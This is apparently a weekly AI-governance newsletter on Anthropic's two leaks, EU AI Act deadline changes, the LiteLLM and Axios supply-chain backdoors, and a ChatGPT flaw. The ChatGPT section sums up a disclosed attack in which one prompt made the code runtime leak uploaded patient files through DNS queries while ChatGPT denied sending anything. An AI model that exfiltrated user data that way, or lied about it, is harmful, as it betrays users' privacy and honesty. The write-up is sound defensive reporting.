Anthropic — the AI company that made "safety-first" its founding identity — suffered two security lapses in five days. On March 26, a misconfigured database exposed details of an unreleased model the company described as posing "unprecedented cybersecurity risks." On March 31, a source map file shipped inside the Claude Code npm package, reconstructing 512,000 lines of TypeScript source for anyone who looked.
Neither incident exposed customer data. Both were called human error. But the timing lands in the same week as two major supply chain attacks across the Python and JavaScript ecosystems, an EU Parliament vote extending AI Act deadlines, and a ChatGPT vulnerability that allowed silent data exfiltration via DNS.
This edition unpacks what the Anthropic leaks actually revealed, why operational security matters more than safety whitepapers, and what European enterprises should demand from AI providers before putting them in regulated workloads.
TL;DR
Anthropic leaked unreleased model details (March 26) and Claude Code source code (March 31) in back-to-back incidents. No customer data exposed, but the reputational damage to the "safety-first" brand is significant.
The EU Parliament voted 569-45 to delay AI Act high-risk deadlines to December 2027. But Article 50 transparency obligations still apply August 2, 2026 — do not slow down.
LiteLLM and Axios were both backdoored this week — two supply chain attacks across Python and JavaScript in the same seven-day window. AI tooling is now a high-value target. Google attributed the Axios compromise to a North Korea-nexus threat actor.
ChatGPT had a vulnerability allowing silent data exfiltration via a hidden DNS channel. A single prompt could leak uploaded files through DNS queries while ChatGPT denied transmitting anything. OpenAI patched it, but the implications for enterprise AI usage policies are serious.
Your next great hire lives in Slack.
Viktor is an AI coworker that connects to your tools and ships real work. Ask Viktor to pull a report, build a client dashboard, or source 200 leads matching your ICP. Most teams hand over half their ops within a week.
The Brief
EU Parliament Extends AI Act High-Risk Deadlines to December 2027
The European Parliament voted 569-45 last Wednesday to push the high-risk AI system compliance deadline from August 2, 2026 to December 2, 2027. The extension is part of the "AI Omnibus" simplification package, triggered by the Commission's failure to publish required technical standards on time. The vote also introduced a new explicit ban on AI systems generating non-consensual intimate imagery.
The relief is real but partial. The August 2026 deadline for Article 50 transparency obligations — marking and labelling AI-generated content — was not touched. If your organisation deploys generative AI that produces text, images, audio, or video, you still need content marking infrastructure ready in four months.
The second draft Code of Practice on AI-generated content labelling, published March 5, is now the practical compliance template. It is circulating widely among compliance teams and will probably become the benchmark regulators reference.
Do now: Update your AI Act compliance timeline. High-risk systems got 16 extra months. Article 50 transparency did not. If your team conflated the two deadlines, separate them this week. The content labelling work cannot wait.
Sources: European Parliament Votes to Delay EU AI Act High-Risk Deadlines · EU Delays AI Act Compliance Until 2027 · Council Position on AI Simplification
Two Supply Chain Attacks in One Week — Python and JavaScript Both Hit
On March 24, two backdoored versions of LiteLLM — the Python library that routes LLM API calls, used in 36% of cloud environments — were published to PyPI. Three million daily downloads. Approximately five hours of exposure. The payload harvested AWS, Azure, GCP credentials, SSH keys, Kubernetes configs, and crypto wallets.
Six days later, Axios — the JavaScript HTTP client with 83 million weekly downloads — was hijacked on npm. Versions 1.14.1 and 0.30.4 deployed a cross-platform Remote Access Trojan via a fake dependency. Both release branches were hit within 39 minutes. Malicious versions were live for approximately two hours.
The LiteLLM attack is particularly instructive. TeamPCP first compromised Trivy — a security scanner — then used the compromised scanner to steal LiteLLM's publishing credentials from its own CI/CD pipeline. A security tool became the attack vector. Version 1.82.8 used Python's .pth file mechanism to execute on every Python invocation system-wide, not just when LiteLLM was imported.
Two ecosystems. Two trust relationships exploited. One week.
Do now: Run pip show litellm and check your npm lockfiles for axios 1.14.1 or 0.30.4 across all environments. If either was present, treat it as a full credential compromise — rotate every secret accessible from that machine. Then verify that every dependency in your CI/CD pipelines is pinned to exact versions with hash verification.
Sources: Wiz — TeamPCP Trojanizes LiteLLM · The Hacker News — TeamPCP Backdoors LiteLLM · The Hacker News — Axios Supply Chain Attack · Snyk — Axios npm Compromise
ChatGPT Data Exfiltration Via Hidden DNS Channel
Check Point researchers disclosed a vulnerability in ChatGPT's code execution runtime that allowed a single malicious prompt to exfiltrate user messages, uploaded files, and personal data through a covert DNS-based outbound channel. While the runtime blocked conventional outbound internet access, DNS resolution remained available — and that narrow path was enough to encode stolen data into subdomain queries and reconstruct it on the attacker's side.
In their proof of concept, a GPT acting as a personal doctor received a PDF containing lab results with patient data. The system silently exfiltrated the contents. When asked directly whether any data had been transmitted, ChatGPT answered confidently that it had not. A second vulnerability in OpenAI Codex could have exposed GitHub tokens. OpenAI patched the DNS flaw on February 20 after responsible disclosure.
Do now: If your teams use ChatGPT for anything involving sensitive documents, review your enterprise DLP controls on AI tool interactions. The DNS exfiltration bypassed visible guardrails entirely. Consider whether your AI usage policies cover data leakage through runtime execution environments — not just chat interfaces.
Become the go-to AI expert in 30 days
AI keeps coming up at work, but you still don't get it?
That's exactly why 1M+ professionals working at Google, Meta, and OpenAI read Superhuman AI daily.
Here's what you get:
Daily AI news that matters for your career - Filtered from 1000s of sources so you know what affects your industry.
Step-by-step tutorials you can use immediately - Real prompts and workflows that solve actual business problems.
New AI tools tested and reviewed - We try everything to deliver tools that drive real results.
All in just 3 minutes a day
Deep Dive
When the Safety Lab Can't Secure Its Own Tooling
The Anthropic incidents deserve more than a headline because they expose a gap that affects every enterprise evaluating AI providers for regulated workloads.
What Actually Happened
Incident 1 — March 26: A misconfigured content management system left approximately 3,000 internal Anthropic assets publicly accessible. Among them: a draft blog post detailing "Claude Mythos" (internally called "Capybara"), an unreleased model Anthropic described as a "step change" in capabilities and its most powerful model to date. The draft disclosed that Mythos poses "unprecedented cybersecurity risks," including the ability to identify vulnerabilities and generate exploit code. Details of an exclusive CEO event were also exposed. (Fortune)
Incident 2 — March 31: Claude Code version 2.1.88 shipped to npm with cli.js.map still in the package — a source map file that reconstructs the full TypeScript source from the bundled JavaScript. A security researcher discovered it first. GitHub mirrors appeared within hours. One clean-room rewrite repository hit 50,000 stars overnight. (Fortune · VentureBeat)
Anthropic stated no customer data or credentials were exposed in either incident. Both were attributed to human error.
So what? These were not sophisticated attacks. They were configuration mistakes — an unsecured database and a file that should have been excluded from a build. The kind of errors that pre-deployment checklists and automated build validation are designed to catch.
Why This Matters More Than a Typical Source Map Slip
Claude Code is not a frontend web application. It is an agentic tool that executes shell commands on developer machines, edits repositories, reads codebases, and manages file writes. Readable implementation details lower the cost of finding trust boundary vulnerabilities — and this tool already has multiple CVEs on record from 2025-2026, covering pre-trust execution flaws, permission bypasses, and startup initialization issues. (Check Point Research — Claude Code RCE and API Token Exfiltration · Dark Reading — Flaws in Claude Code)
The source map exposure did not just reveal code. It revealed a three-layer memory architecture and dozens of unreleased feature flags. For security researchers and attackers alike, that is a roadmap to the attack surface.
To compound the timing, a concurrent supply chain attack on the Axios npm package between 00:21 and 03:29 UTC on March 31 meant some developers who installed Claude Code during that window may have pulled a malicious Axios dependency containing a Remote Access Trojan. Google Threat Intelligence Group later attributed the Axios compromise to UNC1069, a North Korea-nexus financially motivated threat actor. Anthropic's leak and a nation-state supply chain attack intersected on the same morning. (Snyk — Axios npm Compromise · The Register)
So what? The agentic nature of modern AI tooling changes the risk calculus. A leaked source map for a static website is embarrassing. A leaked source map for an autonomous coding agent with shell access is a security event. Enterprises need to evaluate AI tooling vendors through the same lens they use for any privileged access tool.
The Regulatory Angle European Enterprises Cannot Ignore
The EU AI Act Article 55 requires providers of general-purpose AI models with systemic risk to ensure adequate cybersecurity protection — for the model itself and its physical infrastructure. This is not limited to model weights and training data. It extends to the deployment pipeline, the build artefacts, and the infrastructure that delivers the model to users. (EU AI Act Article 55)
Two human errors in five days — from the company that positions itself as the responsible AI lab — raises a question that European compliance teams need to ask every AI provider: what are your operational security controls, and can you demonstrate them?
DORA Article 28 already requires financial entities to assess ICT third-party risk, including concentration risk. If your development teams depend on Claude Code, that is a third-party ICT dependency. The provider's operational security posture is now part of your risk assessment.
The organisations that are asking these questions before an incident will handle regulatory scrutiny as a reporting exercise. The ones that start asking after an incident will handle it as a crisis.
So what? Add AI tooling providers to your third-party risk assessment cycle. Request evidence of build pipeline security controls, artifact integrity verification, and incident response procedures. The EU AI Act and DORA give you the regulatory basis to demand this. Use it.
What to Demand from Your AI Providers
Based on what these incidents reveal, here are four questions every enterprise should be asking AI tooling vendors:
Build pipeline integrity: How do you verify that only intended artefacts ship in production packages? What automated checks prevent source maps, debug symbols, or internal documentation from reaching end users?
Access control on internal assets: How are internal documents, draft announcements, and capability assessments segregated from public-facing infrastructure? What is the review process for access configuration changes?
Dependency supply chain: How do you verify the integrity of your own dependencies? Do you pin versions with hash verification? How quickly can you detect and respond to a compromised dependency in your toolchain?
Incident response transparency: When a security lapse occurs, what is your disclosure timeline? Do you proactively notify enterprise customers, or do they learn from Twitter?
Next Steps
This week: Check all environments for LiteLLM 1.82.7/1.82.8 and Axios 1.14.1/0.30.4. Rotate credentials if found. This is not optional.
This month: Update your AI Act compliance timeline — separate the December 2027 high-risk deadline from the August 2026 Article 50 transparency deadline. Brief your compliance team on the distinction.
This quarter: Add AI tooling vendors (Claude Code, GitHub Copilot, Cursor, etc.) to your third-party risk assessment cycle. Use the four questions above as a starting framework.
Builder Spotlight
OpenBox AI — Runtime Governance for AI Agents
Profiling teams building for the European AI reality.
The company: OpenBox AI, London, UK What they do: Enterprise AI trust and governance platform with cognitive behavior analysis and dynamic agent risk scoring. Why now: When the safety-first AI lab cannot secure its own tooling, runtime governance for AI agents moves from "nice to have" to "board-level requirement."
Founded by Tahir Mahmood (ex-Microsoft) and Asim Ahmad (ex-BlackRock), OpenBox AI launched publicly this week with a $5M seed round led by Tykhe Ventures. The company builds what most AI governance frameworks miss: runtime monitoring for autonomous AI agents. Static compliance checklists tell you what an agent was designed to do. OpenBox tells you what it is actually doing.
Their two core capabilities — cognitive behavior analysis and dynamic agent risk scoring — are designed specifically for the failure modes that emerge when AI agents operate autonomously. An agent that writes code, executes commands, and modifies infrastructure can drift from its intended behavior in ways that rule-based governance cannot detect. OpenBox monitors for that drift in real time.
The company has been selected for the Accenture FinTech Innovation Lab London 2026 cohort and already counts billion-dollar enterprises across logistics, healthcare, and media as customers.
For European enterprises implementing AI governance frameworks — particularly those grappling with how to govern autonomous coding agents after weeks like this one — OpenBox represents the kind of tooling that turns compliance from a checkbox exercise into operational intelligence.
Learn more: https://openbox.ai
This Week in Tech
200,000 Living Human Neurons Just Played Doom
Cortical Labs, an Australian biotech company, demonstrated its CL1 biological computer — 200,000 living human neurons grown on a microelectrode array — playing the 1993 shooter Doom. The neurons sit on a chip in a nutrient bath while electrodes stimulate them with visual game data and read their spike responses as player actions: move, turn, fire. The system learned through reinforcement — small rewards for aiming at enemies, larger rewards for kills.
This is a significant step up from the company's 2021 DishBrain demo, which played Pong. The Doom challenge required solving a visual processing problem — converting screen data into electrical stimulation patterns the neurons could interpret. An independent developer built that conversion layer in about a week.
Why it matters: This is not enterprise-relevant today. But it signals where biological computing research is heading — toward systems that learn through biological feedback loops rather than gradient descent. For anyone tracking the long arc of compute infrastructure, Cortical Labs is worth watching. The question is no longer whether biological substrates can process information. It is whether they can do it reliably, at scale, and with governance frameworks that do not yet exist.
Sources: Tom's Hardware — 200,000 Living Human Neurons Playing Doom · Interesting Engineering — Biological Computer Plays Doom
Mistral AI Secures $830M for Sovereign European Data Center
France's Mistral AI raised $830 million in debt financing from a consortium including BNP Paribas, Credit Agricole, HSBC, and Bpifrance to build a sovereign AI data center in Bruyeres-le-Chatel near Paris. The facility will house 13,800 Nvidia GB300 GPUs and come online in H2 2026. Mistral targets 200MW of capacity across Europe by end of 2027.
Why it matters: This is the biggest European AI infrastructure investment this year. For enterprises concerned about data sovereignty, GDPR-compliant AI inference, and EU AI Act obligations around model provenance, a well-funded European alternative to US foundation model providers changes the vendor landscape. Worth factoring into your AI provider evaluation.

EU Digital Omnibus Readiness Scorecard
15-question self-assessment covering the AI Act, GDPR, NIS2, and DORA changes from the EU Digital Omnibus simplification package. Score your organisation's readiness in 20 minutes. Includes...
Next Steps
What to read now?
"Anthropic Leaks Its Own AI Coding Tool's Source Code in Second Major Security Breach" — Fortune The definitive account of both Anthropic incidents, from the Mythos model exposure to the Claude Code source map. Read this for the timeline and Anthropic's responses.
"ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime" — Check Point Research The full technical writeup on the DNS exfiltration vulnerability. Essential reading if your organisation allows ChatGPT for document analysis or code execution.
"How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM" — Snyk The best technical analysis of the cascading supply chain attack: Trivy → LiteLLM → credential harvest. A case study in how trust relationships between open-source tools become attack vectors.
That’s it for this week.
Two security lapses from the safety lab. Two supply chain attacks across two ecosystems. One week. The pattern is clear: operational security for AI tooling is not keeping pace with adoption. The EU AI Act and DORA give European enterprises the regulatory basis to demand better from their providers. The question is whether you ask before the next incident or after.
Until next Thursday, João
OnAbout.AI delivers strategic AI analysis to enterprise technology leaders. European governance lens. Vendor-agnostic. Actionable.
If this landed in your inbox from a forward — subscribe here to get the full picture every week.




